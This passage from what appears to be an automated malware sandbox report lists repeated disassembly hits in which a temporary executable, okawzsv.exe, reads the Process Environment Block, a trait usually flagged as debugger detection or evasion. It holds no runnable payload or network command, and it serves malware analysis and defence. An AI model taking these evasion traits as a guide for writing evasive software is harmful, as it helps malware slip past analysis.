            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B043D4 mov eax, dword ptr fs:[00000030h]5_2_00B043D4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B043D4 mov eax, dword ptr fs:[00000030h]5_2_00B043D4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A683C0 mov eax, dword ptr fs:[00000030h]5_2_00A683C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A683C0 mov eax, dword ptr fs:[00000030h]5_2_00A683C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A683C0 mov eax, dword ptr fs:[00000030h]5_2_00A683C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A683C0 mov eax, dword ptr fs:[00000030h]5_2_00A683C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE63C0 mov eax, dword ptr fs:[00000030h]5_2_00AE63C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B1C3CD mov eax, dword ptr fs:[00000030h]5_2_00B1C3CD
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A30B mov eax, dword ptr fs:[00000030h]5_2_00A9A30B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A30B mov eax, dword ptr fs:[00000030h]5_2_00A9A30B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A30B mov eax, dword ptr fs:[00000030h]5_2_00A9A30B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5C310 mov ecx, dword ptr fs:[00000030h]5_2_00A5C310
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A80310 mov ecx, dword ptr fs:[00000030h]5_2_00A80310
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0437C mov eax, dword ptr fs:[00000030h]5_2_00B0437C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2A352 mov eax, dword ptr fs:[00000030h]5_2_00B2A352
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B08350 mov ecx, dword ptr fs:[00000030h]5_2_00B08350
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov eax, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov eax, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov eax, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov ecx, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov eax, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov eax, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A664AB mov eax, dword ptr fs:[00000030h]5_2_00A664AB
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A944B0 mov ecx, dword ptr fs:[00000030h]5_2_00A944B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEA4B0 mov eax, dword ptr fs:[00000030h]5_2_00AEA4B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A604E5 mov ecx, dword ptr fs:[00000030h]5_2_00A604E5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5C427 mov eax, dword ptr fs:[00000030h]5_2_00A5C427
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E420 mov eax, dword ptr fs:[00000030h]5_2_00A5E420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E420 mov eax, dword ptr fs:[00000030h]5_2_00A5E420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E420 mov eax, dword ptr fs:[00000030h]5_2_00A5E420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A430 mov eax, dword ptr fs:[00000030h]5_2_00A9A430
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A98402 mov eax, dword ptr fs:[00000030h]5_2_00A98402
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A98402 mov eax, dword ptr fs:[00000030h]5_2_00A98402
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A98402 mov eax, dword ptr fs:[00000030h]5_2_00A98402
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEC460 mov ecx, dword ptr fs:[00000030h]5_2_00AEC460
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8A470 mov eax, dword ptr fs:[00000030h]5_2_00A8A470
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8A470 mov eax, dword ptr fs:[00000030h]5_2_00A8A470
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8A470 mov eax, dword ptr fs:[00000030h]5_2_00A8A470
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8245A mov eax, dword ptr fs:[00000030h]5_2_00A8245A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5645D mov eax, dword ptr fs:[00000030h]5_2_00A5645D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE05A7 mov eax, dword ptr fs:[00000030h]5_2_00AE05A7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE05A7 mov eax, dword ptr fs:[00000030h]5_2_00AE05A7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE05A7 mov eax, dword ptr fs:[00000030h]5_2_00AE05A7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A845B1 mov eax, dword ptr fs:[00000030h]5_2_00A845B1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A845B1 mov eax, dword ptr fs:[00000030h]5_2_00A845B1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A94588 mov eax, dword ptr fs:[00000030h]5_2_00A94588
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A62582 mov eax, dword ptr fs:[00000030h]5_2_00A62582
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A62582 mov ecx, dword ptr fs:[00000030h]5_2_00A62582
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E59C mov eax, dword ptr fs:[00000030h]5_2_00A9E59C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C5ED mov eax, dword ptr fs:[00000030h]5_2_00A9C5ED
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C5ED mov eax, dword ptr fs:[00000030h]5_2_00A9C5ED
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A625E0 mov eax, dword ptr fs:[00000030h]5_2_00A625E0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E5CF mov eax, dword ptr fs:[00000030h]5_2_00A9E5CF
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E5CF mov eax, dword ptr fs:[00000030h]5_2_00A9E5CF
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A665D0 mov eax, dword ptr fs:[00000030h]5_2_00A665D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A5D0 mov eax, dword ptr fs:[00000030h]5_2_00A9A5D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A5D0 mov eax, dword ptr fs:[00000030h]5_2_00A9A5D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E53E mov eax, dword ptr fs:[00000030h]5_2_00A8E53E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E53E mov eax, dword ptr fs:[00000030h]5_2_00A8E53E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E53E mov eax, dword ptr fs:[00000030h]5_2_00A8E53E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E53E mov eax, dword ptr fs:[00000030h]5_2_00A8E53E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E53E mov eax, dword ptr fs:[00000030h]5_2_00A8E53E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF6500 mov eax, dword ptr fs:[00000030h]5_2_00AF6500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9656A mov eax, dword ptr fs:[00000030h]5_2_00A9656A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9656A mov eax, dword ptr fs:[00000030h]5_2_00A9656A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9656A mov eax, dword ptr fs:[00000030h]5_2_00A9656A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A68550 mov eax, dword ptr fs:[00000030h]5_2_00A68550
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A68550 mov eax, dword ptr fs:[00000030h]5_2_00A68550
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C6A6 mov eax, dword ptr fs:[00000030h]5_2_00A9C6A6
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A966B0 mov eax, dword ptr fs:[00000030h]5_2_00A966B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64690 mov eax, dword ptr fs:[00000030h]5_2_00A64690
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64690 mov eax, dword ptr fs:[00000030h]5_2_00A64690
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE6F2 mov eax, dword ptr fs:[00000030h]5_2_00ADE6F2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE6F2 mov eax, dword ptr fs:[00000030h]5_2_00ADE6F2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE6F2 mov eax, dword ptr fs:[00000030h]5_2_00ADE6F2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE6F2 mov eax, dword ptr fs:[00000030h]5_2_00ADE6F2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE06F1 mov eax, dword ptr fs:[00000030h]5_2_00AE06F1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE06F1 mov eax, dword ptr fs:[00000030h]5_2_00AE06F1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A6C7 mov ebx, dword ptr fs:[00000030h]5_2_00A9A6C7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A6C7 mov eax, dword ptr fs:[00000030h]5_2_00A9A6C7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E627 mov eax, dword ptr fs:[00000030h]5_2_00A7E627
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A96620 mov eax, dword ptr fs:[00000030h]5_2_00A96620
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A98620 mov eax, dword ptr fs:[00000030h]5_2_00A98620
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6262C mov eax, dword ptr fs:[00000030h]5_2_00A6262C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE609 mov eax, dword ptr fs:[00000030h]5_2_00ADE609
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2619 mov eax, dword ptr fs:[00000030h]5_2_00AA2619
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A660 mov eax, dword ptr fs:[00000030h]5_2_00A9A660
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A660 mov eax, dword ptr fs:[00000030h]5_2_00A9A660
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2866E mov eax, dword ptr fs:[00000030h]5_2_00B2866E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2866E mov eax, dword ptr fs:[00000030h]5_2_00B2866E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A92674 mov eax, dword ptr fs:[00000030h]5_2_00A92674
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7C640 mov eax, dword ptr fs:[00000030h]5_2_00A7C640
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A607AF mov eax, dword ptr fs:[00000030h]5_2_00A607AF
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0678E mov eax, dword ptr fs:[00000030h]5_2_00B0678E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A827ED mov eax, dword ptr fs:[00000030h]5_2_00A827ED
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A827ED mov eax, dword ptr fs:[00000030h]5_2_00A827ED
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A827ED mov eax, dword ptr fs:[00000030h]5_2_00A827ED
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEE7E1 mov eax, dword ptr fs:[00000030h]5_2_00AEE7E1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A647FB mov eax, dword ptr fs:[00000030h]5_2_00A647FB
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A647FB mov eax, dword ptr fs:[00000030h]5_2_00A647FB
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6C7C0 mov eax, dword ptr fs:[00000030h]5_2_00A6C7C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE07C3 mov eax, dword ptr fs:[00000030h]5_2_00AE07C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C720 mov eax, dword ptr fs:[00000030h]5_2_00A9C720
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C720 mov eax, dword ptr fs:[00000030h]5_2_00A9C720
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9273C mov eax, dword ptr fs:[00000030h]5_2_00A9273C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9273C mov ecx, dword ptr fs:[00000030h]5_2_00A9273C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9273C mov eax, dword ptr fs:[00000030h]5_2_00A9273C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADC730 mov eax, dword ptr fs:[00000030h]5_2_00ADC730
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C700 mov eax, dword ptr fs:[00000030h]5_2_00A9C700
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A60710 mov eax, dword ptr fs:[00000030h]5_2_00A60710
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A90710 mov eax, dword ptr fs:[00000030h]5_2_00A90710
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A68770 mov eax, dword ptr fs:[00000030h]5_2_00A68770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9674D mov esi, dword ptr fs:[00000030h]5_2_00A9674D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9674D mov eax, dword ptr fs:[00000030h]5_2_00A9674D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9674D mov eax, dword ptr fs:[00000030h]5_2_00A9674D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEE75D mov eax, dword ptr fs:[00000030h]5_2_00AEE75D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A60750 mov eax, dword ptr fs:[00000030h]5_2_00A60750
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2750 mov eax, dword ptr fs:[00000030h]5_2_00AA2750
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2750 mov eax, dword ptr fs:[00000030h]5_2_00AA2750
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE4755 mov eax, dword ptr fs:[00000030h]5_2_00AE4755
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A60887 mov eax, dword ptr fs:[00000030h]5_2_00A60887
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEC89D mov eax, dword ptr fs:[00000030h]5_2_00AEC89D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C8F9 mov eax, dword ptr fs:[00000030h]5_2_00A9C8F9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C8F9 mov eax, dword ptr fs:[00000030h]5_2_00A9C8F9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2A8E4 mov eax, dword ptr fs:[00000030h]5_2_00B2A8E4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E8C0 mov eax, dword ptr fs:[00000030h]5_2_00A8E8C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0483A mov eax, dword ptr fs:[00000030h]5_2_00B0483A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0483A mov eax, dword ptr fs:[00000030h]5_2_00B0483A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h]5_2_00A9A830
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A82835 mov eax, dword ptr fs:[00000030h]5_2_00A82835
